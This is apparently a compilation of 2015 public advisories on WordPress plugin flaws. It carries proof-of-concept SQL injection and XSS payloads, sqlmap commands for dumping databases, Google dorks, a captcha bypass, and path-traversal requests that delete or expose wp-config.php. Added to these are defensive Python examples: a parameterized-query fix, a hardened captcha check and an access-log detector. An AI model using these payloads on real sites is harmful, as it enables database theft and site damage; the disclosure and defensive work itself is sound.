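Both handlers now funnel the id through one place, which is where to put any future validation (ownership checks, rate limiting on the public endpoint). The status message in the AJAX reply is kept identical for every invalid id because, as the explanation above shows, a response that differs with the truth of the query is exactly what makes blind extraction practical.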
 
5. Solution
---------------
 
Update to version 1.6


WordPress Ultimate Product Catalogue 3.1.2 SQL Injection

--------
ISSUE 1:
 
# Exploit Title: Unauthenticated SQLi in Item_ID POST parameter on Ultimate Product Catalogue WordPress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Communicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : Requested to mitre but not assigned yet
# Category: webapps
 
1. Summary:
 
    Ultimate Product Catalogue is a responsive and easily customizable
plugin for all your product catalogue needs. It has +62.000 downloads,
+4.000 active installations.
 
    Unauthenticated SQL injection in ajax call when the plugin is counting
the times a product is being seen by the web visitors. The vulnerable POST
parameter is "Item_ID".
 
2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Communicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3
3. Vulnerable code:
 
    In file Functions/Process_Ajax.php, line 67:
[...]
$Item_ID = $_POST['Item_ID'];                         // attacker-controlled, never validated
$Item = $wpdb->get_row("SELECT Item_Views FROM $items_table_name WHERE Item_ID=" . $Item_ID);  // concatenated unquoted
[...]
 
3. Proof of concept:
 
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: <wordpress host>
    [...]
    Cookie: wordpress_f305[...]

    Item_ID=2 AND SLEEP(5)&action=record_view
 
4. Solution:
 
    Update to version 3.1.3
 
-- 
Felipe Molina de la Torre
 
PGP Key ID: BB7CFB45
 
 
 
--------
ISSUE 2:
 
 
# Exploit Title: Unauthenticated SQLi on Ultimate Product Catalogue WordPress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: < 3.1.2, Communicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : Requested to mitre but not assigned yet
# Category: webapps
 
1. Summary:
 
     Ultimate Product Catalogue is a responsive and easily customizable
plugin for all your product catalogue needs. It has +62.000 downloads,
+4.000 active installations.
 
 Unauthenticated SQL injection in the parameter "SingleProduct" when a web
visitor views a product published by the web administrator.
 
2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Communicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3
3. Vulnerable code:
 
    File Functions/Shortcodes.php line 779
 
3. Proof of concept
 
    http://<wordpress site>/?SingleProduct=2'+and+'a'='a
    http://<wordpress site>/?SingleProduct=2'+and+'a'='b
 
4. Solution:
 
    Update to version 3.1.3
 
-- 
Felipe Molina de la Torre
 
PGP Key ID: BB7CFB45


WordPress Booking Calendar Contact Form 1.0.2 XSS / SQL Injection

# Exploit Title: WordPress Booking Calendar Contact Form 1.0.2[Multiple vulnerabilities]
# Date: 2015-05-01
# Google Dork: Index of /wordpress/wp-content/plugins/booking-calendar-contact-form/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Vendor: CodePeople.net
# Vendor URI: http://codepeople.net
# Version: 1.0.2
# OWASP Top10: A1-Injection
# Tested on: windows 7 ultimate + firefox + sqlmap 0.9.

============================================
* Authenticated SQL injection
============================================

========================
Description
========================

On a site that has the vulnerable plugin installed, an attacker who holds an
account with editor privileges can exploit the SQL injection flaw and
possibly escalate their privileges.

========================
Vulnerability
========================
The vulnerable function is located in dex_bcf.php:

function dex_bccf_load_season_prices() {
    global $wpdb;

    if ( ! current_user_can('edit_pages') )
    {
        echo 'No enough privilegies to load this content.';
        exit;
    }

    if (!defined('CP_BCCF_CALENDAR_ID'))
        define ('CP_BCCF_CALENDAR_ID',$_GET["dex_item"]);

    //.....vulnerable line

    $codes = $wpdb->get_results( 'SELECT * FROM '.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE `cal_id`='.CP_BCCF_CALENDAR_ID);
    $maxcosts = 0;

    ...

    if (count ($codes))
    {
        ... //Print results [good for extracting rows via UNION]

        foreach ($codes as $value)
        {
            echo '';
            $price = explode(';',$value->price);
            echo ' '.$price[0].'';
            for ($k=1; $k<=$maxcosts; $k++)
                echo ''.@$price[$k].'';
            echo ''.substr($value->date_from,0,10).'';
            echo ''.substr($value->date_to,0,10).'';
            echo '[ href="javascript:dex_delete_season_price('.$value->id.')">Delete]';
            echo '';
        }

        ...
    }

======================
Injection
======================
The following URL can be used to inject code.
----------------------------------------------------------

http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1

------------------------
GET parameter vulnerable
------------------------
dex_item

========================
Injection techniques:
========================

-> UNION BASED
-> TIME BASED BLIND

=======================
POC
=======================
Obtaining all available databases from mysql server with sqlmap.
---------------------------------------------------------------

python sqlmap.py --url="http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1" \
  -p dex_item --level=5 --risk=3 --cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE" \
  --dbms="mysql" --dbs

====================================================

=====================================================
* Filter bypass & Authenticated SQL injection
=====================================================

===============
Vulnerable code
================

function dex_bccf_calendar_delete($ret) {
global $wpdb;
$wpdb->query( "delete from ".TDE_BCCFCALENDAR_DATA_TABLE." where
id=".esc_sql($_POST["id"]) );
return $ret;
}

======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------

http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete

------------------------
POST parameter vulnerable
------------------------
id

========================
Injection techniques:
========================

-> TIME BASED BLIND

=======================
POC
=======================
Obtaining all available databases from mysql server with sqlmap.
---------------------------------------------------------------

python sqlmap.py --url="http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete" \
  --data="id=1" -p id --level=5 --risk=3 \
  --cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE" --dbms="mysql" --dbs --technique T

====================================================
* Authenticated SQL injection
====================================================

===============
Vulnerable code
================

function dex_bccf_calendar_update($ret) {
global $wpdb;

dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "viadmin",
"varchar(10) DEFAULT '0' NOT NULL");
dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "color",
"varchar(10)");

$wpdb->query("update ".TDE_BCCFCALENDAR_DATA_TABLE." set
title='".esc_sql($_POST["title"])."',description='".esc_sql($_POST["description"])."',color='".esc_sql($_POST["color"])."'
where id=".esc_sql($_POST["id"]) );
return $ret;
}

======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------

http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit

------------------------
POST parameter vulnerable
------------------------
id

========================
Injection techniques:
========================

-> BLIND

=======================
POC
=======================
(modifying all rows with the "i0akiN" value and sleeping 5 seconds)

url
-------

http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit

----------
post data
----------
id=0 or 1=1 AND SLEEP(5) -- -
&tile=i0akiN&description=i0akiN&color=i0akiN

=====================================================
* Filter bypass & Authenticated SQL injection
=====================================================

===============
Vulnerable code
================

function dex_bccf_calendar_add($ret) {
global $wpdb;

$calid = str_replace (TDE_BCCFCAL_PREFIX, "",@$_GET["id"]);
...

$wpdb->query("insert into
".TDE_BCCFCALENDAR_DATA_TABLE."(viadmin,reservation_calendar_id,datatime_s,datatime_e,title,description,color)
".
"
values(1,".esc_sql($calid).",'".esc_sql($_POST["startdate"])."','".esc_sql($_POST["enddate"])."','".esc_sql($_POST["title"])."','"
.esc_sql($_POST["description"])."','".esc_sql($_POST["color"])."')");
..

}
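Why esc_sql() does not protect the delete/update/insert functions above, and what does: the value lands in an UNQUOTED numeric context (where id=...), so a payload that contains no quote character passes through a quote-escaping filter unchanged. The following is an added Python model of that failure mode and of the hardened form; it is not part of this advisory or of the plugin. esc_sql_like is a constructed stand-in for WordPress's esc_sql(), and the in-memory SQLite table is constructed for the demonstration. In a WordPress plugin the equivalent hardened form is $wpdb->prepare() with a %d placeholder (or absint()/intval() before concatenation).

```python
import re
import sqlite3
from typing import Tuple


def esc_sql_like(value: str) -> str:
    """Constructed stand-in for a quote-escaping filter such as WordPress's
    esc_sql(): backslash-escape quotes and backslashes, nothing else."""
    return re.sub(r"([\\'\"])", r"\\\1", value)


def is_valid_id(value: str) -> bool:
    """Allowlist check for a numeric primary key (what the plugin expects)."""
    return re.fullmatch(r"\d+", value) is not None


def fresh_db() -> sqlite3.Connection:
    """In-memory table standing in for the plugin's calendar data table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE calendar_data (id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO calendar_data VALUES (?, ?)",
                    [(1, "one"), (2, "two"), (3, "three")])
    return con


def remaining(con: sqlite3.Connection) -> int:
    """Rows left in the table."""
    return con.execute("SELECT COUNT(*) FROM calendar_data").fetchone()[0]


def delete_escaped_only(con: sqlite3.Connection, user_id: str) -> Tuple[str, int]:
    """The advisory's pattern: the escaped value is concatenated into an
    unquoted numeric context, so a payload without quotes is left untouched.
    Returns the query that actually ran and the rows left afterwards."""
    sql = "DELETE FROM calendar_data WHERE id=" + esc_sql_like(user_id)
    con.execute(sql)
    return sql, remaining(con)


def delete_parameterized(con: sqlite3.Connection, user_id: str) -> int:
    """Hardened form: validate, cast, and bind the value. In a WordPress
    plugin this is $wpdb->prepare("DELETE ... WHERE id = %d", absint($id))."""
    if not is_valid_id(user_id):
        raise ValueError("id must be a non-negative integer")
    con.execute("DELETE FROM calendar_data WHERE id=?", (int(user_id),))
    return remaining(con)


if __name__ == "__main__":
    # Constructed payload in the advisory's shape: nothing for esc_sql to escape.
    payload = "1 OR 1=1"
    print(delete_escaped_only(fresh_db(), payload)[1])  # 0: every row was deleted
    print(delete_parameterized(fresh_db(), "1"))        # 2: only row 1 was deleted
```

The same reasoning applies to the quoted string columns in the update and insert functions: escaping is only meaningful for the exact context the value is placed in, which is why a bound parameter (or a strict cast for integer keys) is the fix rather than a better escaping routine.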

======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------

http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add&id=[SQLi]

========================
Injection techniques:
========================

-> Insertion data

=======================
POC
=======================

Inserts a row into the wp_bccf_reservation_calendars_data table without
using the other POST parameters.

http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add&

id=12,0x617373,0x617373,0x617373,0x617373,0x617373); -- -

====================================================
* Unauthenticated SQL injection
====================================================
=======================
Description
=======================

An attacker without authorization can send modified queries to the database
and obtain sensitive information that can be used to escalate privileges
and more.

======================
Vulnerability
======================
The vulnerable function is located in dex_bcf.php:

function dex_bccf_caculate_price($startday, $enddate, $calendar,
$default_price) {
...

//$calendar is not sanitized in sql query

$codes = $wpdb->get_results( 'SELECT * FROM
'.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE
`cal_id`='.$calendar);
$mode =
(dex_bccf_get_option('calendar_mode',DEX_BCCF_DEFAULT_CALENDAR_MODE) ==
'false');
while (
(($enddate>$startday) && !$mode) ||
(($enddate>=$startday) && $mode)
)
{
$daily_price = $default_price;
$sprice = array();
foreach ($codes as $value)
{
$sfrom = strtotime($value->date_from);
$sto = strtotime($value->date_to);
if ($startday >= $sfrom && $startday <= $sto)
{
$sprice = explode (';', $value->price);
$daily_price = $sprice[0];
}
}
$season_prices[] = $sprice;
$price += $daily_price;
$startday = strtotime (date("Y-m-d", $startday)." +1 day");
//60*60*24;
$days++;
}

...
}

======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------

http://wp-host/wp-path/?action=dex_bccf_check_posted_data&dex_bccf=getcost

------------------------
post variable vulnerable
------------------------
dex_item=1

========================
Injection techniques:
========================

-> UNION BASED <- yeaahh!!
-> TIME BASED BLIND
-> BOOLEAN BASED BLIND

========================
POC
========================
Obtaining all available databases from mysql server with sqlmap.

python sqlmap.py --url="http://localhost/wordpress/?action=dex_bccf_check_posted_data&dex_bccf=getcost" \
  --data="dex_item=1" -p dex_item --level=5 --risk=3 --dbms="mysql" --dbs \
  --technique U

===========================================================

============================================================
* Unauthenticated SQL injection 2
============================================================

========================
Description
========================

The following function is also vulnerable to SQL injection because the
constant CP_BCCF_CALENDAR_ID is usually set from the content of
POST['dex_item'] or GET['dex_item']. Besides, this function is used in
several places in the code.

========================
Vulnerability
========================
Vulnerable function:

function dex_bccf_get_option ($field, $default_value)
{
global $wpdb, $dex_option_buffered_item, $dex_option_buffered_id;
if (!defined("CP_BCCF_CALENDAR_ID"))
return $default_value;
if ($dex_option_buffered_id == CP_BCCF_CALENDAR_ID)
$value = @$dex_option_buffered_item->$field;
else
{
//....vulnerable line

$myrows = $wpdb->get_results( "SELECT * FROM
".DEX_BCCF_CONFIG_TABLE_NAME." WHERE id=".CP_BCCF_CALENDAR_ID );
$value = @$myrows[0]->$field;
$dex_option_buffered_item = $myrows[0];
$dex_option_buffered_id = CP_BCCF_CALENDAR_ID;
}
if ($value == '' && $dex_option_buffered_item->calendar_language == '')
$value = $default_value;
return $value;
}

##########################################

======================================
* CAPTCHA BYPASS & ROW INSERTION
======================================

==============
DESCRIPTION
==============

An attacker can manipulate some variables to bypass conditional statements,
for example to insert unlimited rows into the table (could use a program).

=============
... HOW?
=============

An attacker computes the MD5 hash of the GET['hdcaptcha_dex_bccf_post']
parameter and stores it as the value of the "rand_code" cookie.

==========
POC
==========

REQUEST
-----------

http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&hdcaptcha_dex_bccf_post=1&dex_item=1&

http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&hdcaptcha_dex_bccf_post=1&dex_item=1&hdcaptcha_dex_bccf_post=joaquin
(the repeated hdcaptcha_dex_bccf_post=joaquin is the value that is checked; PHP keeps the last occurrence of a duplicated GET key)

--------------
POST VARIABLES
--------------
hdcaptcha_dex_bccf_post=1

-------
COOKIES
-------
rand_code=a6beca7f198112079f836a4e67cf4821 <--- MD5 hash of "joaquin"

===========================
VULNERABLE FUNCTION CODE
==========================

function dex_bccf_check_posted_data(){
....

if (!isset($_GET['hdcaptcha_dex_bccf_post'])
||$_GET['hdcaptcha_dex_bccf_post'] == '') $_GET['hdcaptcha_dex_bccf_post']
= @$_POST['hdcaptcha_dex_bccf_post'];
if (
(dex_bccf_get_option('dexcv_enable_captcha',
TDE_BCCFDEFAULT_dexcv_enable_captcha) != 'false') &&
( (strtolower($_GET['hdcaptcha_dex_bccf_post']) !=
strtolower($_SESSION['rand_code'])) ||
($_SESSION['rand_code'] == '')
)
&&
( (md5(strtolower($_GET['hdcaptcha_dex_bccf_post'])) !=
($_COOKIE['rand_code'])) ||
($_COOKIE['rand_code'] == '')
)
)
{
$_SESSION['rand_code'] = '';
echo 'captchafailed';
exit;
}

// if this isn't the real post (it was the captcha verification) then echo
ok and exit
if ( 'POST' != $_SERVER['REQUEST_METHOD'] || ! isset(
$_POST['dex_bccf_post'] ) )
{
echo 'ok';
exit;
}
...

}
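The bypass works because the predicate above rejects the request only when the session check AND the cookie check both fail, and the cookie is chosen by the client. The following is an added Python port of that predicate beside a hardened version; it is not the plugin's code and not part of the advisory. The session dictionary and the answers are constructed inputs; the hardened check assumes the captcha code is stored server-side only (PHP's $_SESSION in the plugin's case).

```python
import hashlib
import hmac
from typing import Dict


def md5_hex(text: str) -> str:
    """MD5 hex digest, matching what the plugin stores in the rand_code cookie."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def flawed_captcha_passes(answer: str, session_code: str, cookie_code: str) -> bool:
    """Port of the plugin's predicate (captcha assumed enabled). The request is
    rejected only when the session check AND the cookie check both fail, so a
    cookie the client sets itself is enough to pass."""
    session_fails = session_code == "" or answer.lower() != session_code.lower()
    cookie_fails = cookie_code == "" or md5_hex(answer.lower()) != cookie_code
    return not (session_fails and cookie_fails)


def fixed_captcha_passes(answer: str, session: Dict[str, str]) -> bool:
    """Hardened check: only the server-side session value counts, the
    comparison is constant-time, and the code is consumed on first use so one
    solved captcha cannot be replayed for unlimited submissions."""
    expected = session.pop("rand_code", "")
    if not expected:
        return False
    return hmac.compare_digest(answer.lower().encode("utf-8"),
                               expected.lower().encode("utf-8"))


if __name__ == "__main__":
    # Constructed scenario: no captcha was ever solved (empty session), the
    # client supplies its own answer and a cookie holding that answer's MD5.
    forged_cookie = md5_hex("joaquin")
    print(flawed_captcha_passes("joaquin", "", forged_cookie))   # True: bypass
    print(fixed_captcha_passes("joaquin", {}))                   # False
```

Consuming the code on use is what closes the "insert unlimited rows" part of the finding: in the original, the session value is only cleared on failure, so one valid answer can be resubmitted indefinitely.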

###########################################

=======================================
* Persistent JS/HTML code injection
=======================================

========================
Description:
========================
An unauthenticated attacker can inject malicious code that could be executed
by the victim's browser (the victim could be an administrator). When the
victim visits the modified page, the attacker could steal data and/or
remotely control the victim's actions.

========================
Vulnerability
========================

http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data

POST-DATA

dex_item=2
dex_bccf_post_options=1
email_confirmation_to_user=%3C%2Ftextarea%3E[CUSTOM JS/HTML INJECTION]%3Ctextarea%3E
email_notification_to_admin=%3C%2Ftextarea%3E[CUSTOM JS/HTML INJECTION]%3Ctextarea%3E

The parameters email_confirmation_to_user and email_notification_to_admin
are not filtered and are included in the admin page.

====================
VULNERABLE FUNCTION
====================

dex_bccf_save_options(), located in dex_bccf.php, saves the POST data
unfiltered.

#########################################



WordPress Media File Manager Advanced 1.1.5 XSS / SQL Injection

Description
 
"media-file-manager-advanced" allows any authenticated user to execute administrator actions due to weak permission checking.
An attacker can delete/update posts, create/remove/list directories, move/rename/delete files, and perform blind SQL injection and cross-site scripting.
 
Homepage
 
https://wordpress.org/plugins/media-file-manager-advanced/
 
Affected Version
 
<= 1.1.5
 
Vulnerability Scope
 
LFD,SQL,XSS,Site Ruining and Changing of Content.
 
Authorization Required
 
User
 
Proof of Concept
 
 
Post Delete
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete
post: id=17
 
MKDIR
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_mkdir
newdir=EVEXFOLDER
 
folder exists: http://domain.tld/wp-contents/uploads/EVEXFOLDER
 
RMDIR (Dir Must Be Empty)
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete_empty_dir
dir=EVEXFOLDER&name=
 
not found: http://domain.tld/wp-contents/uploads/EVEXFOLDER
 
UNLINK
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete
dir=../../&name=wp-config.php
 
no more wp-config.php
 
Blind SQL INJECTION
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen
id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ)
 
Sleeps for 10 seconds
 
XSS
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen
id="</button><script>alert(1)</script>
 
Alerts(1)
 
Update Post
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_update_media_information
id=34&title=New_Title&caption=bla&description=Dummy Description
 
Move Files
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_move
dir_from=../../&items=wp-config.php&dir_to=
 
now wp-config.php is in /wp-content/uploads/wp-config.php
 
 
Renaming Files
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_rename
dir=../../&from=wp-config.php&to=wp-config.txt
 
now wp-config.php is renamed to wp-config.txt
 
Directory Listing
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_getdir
dir=../../
 
will list all files and directories
 
Fix
 
No Fix Available at The Moment.
 
Time line
 
Notified Vendor - No Reply
Publish Disclosure
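With no fix available, the defender's option is to spot these requests in the access log. The following is an added Python detector, not part of this advisory, run over constructed log lines that reproduce the request shapes shown above (traversal in dir, SLEEP() in id, a script tag in id) plus two benign requests. It assumes the parameters appear in the query string (or that a proxy/WAF logs request bodies in the same form); the IP addresses and timestamps are constructed.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample access-log lines. Lines 2-4 reproduce the shapes in the advisory.
SAMPLE_LOG = """\
192.0.2.10 - - [25/May/2015:12:25:01 +0000] "GET /wp-admin/admin-ajax.php?action=mfma_relocator_getdir&dir=2015 HTTP/1.1" 200 512
198.51.100.7 - - [25/May/2015:12:25:02 +0000] "GET /wp-admin/admin-ajax.php?action=mfma_relocator_getdir&dir=..%2F..%2F HTTP/1.1" 200 4096
198.51.100.7 - - [25/May/2015:12:25:13 +0000] "GET /wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(10)))LCKZ) HTTP/1.1" 200 88
198.51.100.7 - - [25/May/2015:12:25:14 +0000] "GET /wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen&id=%22%3C%2Fbutton%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 91
192.0.2.10 - - [25/May/2015:12:26:00 +0000] "GET /wp-admin/admin.php?where1=agent&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1" 200 2048
"""

# Common/combined log format up to the response size.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Signatures for the request shapes the advisory documents.
RULES: List[Tuple[str, "re.Pattern"]] = [
    ("time-based-sqli", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("boolean-sqli", re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+", re.I)),
    ("path-traversal", re.compile(r"(^|[\\/])\.\.([\\/]|$)")),
    ("xss", re.compile(r"<\s*script\b|javascript:", re.I)),
]


def decoded_params(target: str) -> List[Tuple[str, str]]:
    """Parse the query string; decode values a second time so double-encoded
    payloads (%252e%252e%252f) are inspected in clear as well."""
    query = urlsplit(target).query
    return [(k, unquote_plus(v)) for k, v in parse_qsl(query, keep_blank_values=True)]


def classify(params: List[Tuple[str, str]]) -> List[str]:
    """Names of every rule that fires on any parameter value, in RULES order."""
    return [name for name, pattern in RULES
            if any(pattern.search(value) for _, value in params)]


def scan(log_text: str) -> List[Dict]:
    """Scan access-log text; one finding per line that triggers a rule."""
    findings = []
    for lineno, raw in enumerate(log_text.splitlines(), start=1):
        match = LINE_RE.match(raw)
        if not match:
            continue  # not a log line in the expected format
        params = decoded_params(match.group("target"))
        hits = classify(params)
        if hits:
            findings.append({
                "line": lineno,
                "ip": match.group("ip"),
                "action": dict(params).get("action"),
                "hits": hits,
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Pairing the "action" field with the WordPress user behind the request (from the auth cookie or a login audit plugin) turns a hit into an actionable lead, since every one of these actions requires an authenticated account.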


WordPress NewStatPress 0.9.8 Cross Site Scripting / SQL Injection

# Title: Multiple vulnerabilities in WordPress plugin "NewStatPress"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/newstatpress/
# Active installs: 20,000+
# Vulnerable version: 0.9.8
# Fixed version: 0.9.9
# CVE: CVE-2015-4062, CVE-2015-4063
 
 Vulnerabilities (2)
=====================
 
(1) Authenticated SQLi [CWE-89] (CVE-2015-4062)
-----------------------------------------------
 
* CODE:
includes/nsp_search.php:94
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
    if(($_GET["what$i"] != '') && ($_GET["where$i"] != '')) {
        $where.=" AND ".$_GET["where$i"]." LIKE '%".$_GET["what$i"]."%'";
    }
}
+++++++++++++++++++++++++++++++++++++++++
 
* POC:
http://[domain]/wp-admin/admin.php?where1=agent[SQLi]&limitquery=1&searchsubmit=Buscar&page=nsp_search
 
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?where1=agent&limitquery=1&searchsubmit=Buscar&page=nsp_search" -p where1
[............]
GET parameter 'where1' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 89 HTTP(s) requests:
---
Parameter: where1 (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: where1=agent AND (SELECT * FROM (SELECT(SLEEP(5)))Guji)&limitquery=1&searchsubmit=Buscar&page=nsp_search
---
[12:25:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
+++++++++++++++++++++++++++++++++++++++++
 
 
(2) Authenticated XSS [CWE-79] (CVE-2015-4063)
----------------------------------------------
 
includes/nsp_search.php:128
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
    if($_GET["where$i"] != '') { print "<th scope='col'>".ucfirst($_GET["where$i"])."</th>"; }
}
+++++++++++++++++++++++++++++++++++++++++
 
* POC:
http://[domain]/wp-admin/admin.php?where1=<script>alert(String.fromCharCode(88,+83,+83))</script>&searchsubmit=Buscar&page=nsp_search
 
 
 Timeline
==========
2015-05-09: Discovered vulnerability.
2015-05-19: Vendor notification.
2015-05-19: Vendor response.
2015-05-20: Vendor fix.
2015-05-25: Public disclosure.


WordPress easy2map 1.24 SQL Injection

Title: SQL Injection in easy2map wordpress plugin v1.24
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.25
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=131
Description: The easiest tool available for creating custom & great-looking Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity.
Vulnerability:
The following lines in Function.php use sprintf() to format queries sent to the database; this neither sanitizes user input nor
parameterizes the query.
 
90         $wpdb->query(sprintf("UPDATE $mapsTable
91         SET PolyLines = '%s'
92         WHERE ID = '%s';", $PolyLines, $mapID));
 
.
.
.
163             $wpdb->query(sprintf("
164                 UPDATE $mapsTable
165                 SET TemplateID = '%s',
166                     MapName = '%s',
167                     Settings = '%s',
168                     LastInvoked = CURRENT_TIMESTAMP,
169                     CSSValues = '%s',
170                     CSSValuesList = '%s',
171                     CSSValuesHeading = '%s',
172                     MapHTML = '%s',
173                     IsActive = 1,
174                     ThemeID = '%s'
175                 WHERE ID = %s;",
176                     $Items['mapTemplateName'],
177                     $Items['mapName'],
178                     urldecode($Items['mapSettingsXML']),
179                     urldecode($Items["mapCSSXML"]),
180                     urldecode($Items["listCSSXML"]),
181                     urldecode($Items["headingCSSXML"]),
182                     urldecode($Items["mapHTML"]),
183                     $Items['mapThemeName'],
184                     $mapID));
185         } else {
186 
187             //this is a map insert
188             if (!$wpdb->query(sprintf("
189             INSERT INTO $mapsTable(
190                 TemplateID,
191                 MapName,
192                 DefaultPinImage,
193                 Settings,
194                 LastInvoked,
195                 PolyLines,
196                 CSSValues,
197                 CSSValuesList,
198                 CSSValuesHeading,
199                 MapHTML,
200                 IsActive,
201                 ThemeID
202             ) VALUES ('%s', '%s', '%s', '%s', 
203                     CURRENT_TIMESTAMP, '%s', '%s', '%s', '%s', '%s', 0, '%s');",
204                     $Items['mapTemplateName'],
205                     $Items['mapName'], str_replace('index.php', '', easy2map_get_plugin_url('/index.php')) .     "images/map_pins/pins/111.png",
206                     urldecode($Items['mapSettingsXML']), '',
207                     urldecode($Items["mapCSSXML"]),
208                     urldecode($Items["listCSSXML"]),
209                     urldecode($Items["headingCSSXML"]),
210                     urldecode($Items["mapHTML"]),
211                     $Items['mapThemeName']))) 
.
.
267         $wpdb->query(sprintf("
268             UPDATE $mapsTable
269             SET MapName = '%s',
270             LastInvoked = CURRENT_TIMESTAMP,
271             IsActive = 1
272             WHERE ID = %s;", $mapName, $mapID));
 
In MapPinImageSave.php, input isn't sanitized when creating a directory, allowing ../ to create files outside of the intended directory:
 
4 $imagesDirectory = WP_CONTENT_DIR . "/uploads/easy2map/images/map_pins/uploaded/" . $_GET["map_id"] . "/";
.
.
